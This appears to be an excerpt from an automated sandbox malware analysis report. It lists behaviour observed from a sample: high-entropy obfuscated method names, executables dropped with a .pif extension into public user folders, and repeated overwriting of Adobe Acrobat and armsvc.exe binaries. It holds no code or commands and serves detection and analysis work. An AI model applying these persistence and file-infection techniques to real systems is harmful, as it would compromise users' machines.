                    Source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                    Persistence and Installation Behavior

                    barindex
                    Creates files in the system32 config directory
                    Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\605af54964cdb3b4.bin
                    Drops PE files with a suspicious file extension
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeFile created: C:\Users\Public\Libraries\aymtmquJ.pifJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Juqmtmya.PIFJump to dropped file
                    Drops executable to a common third party application directory
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                    Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
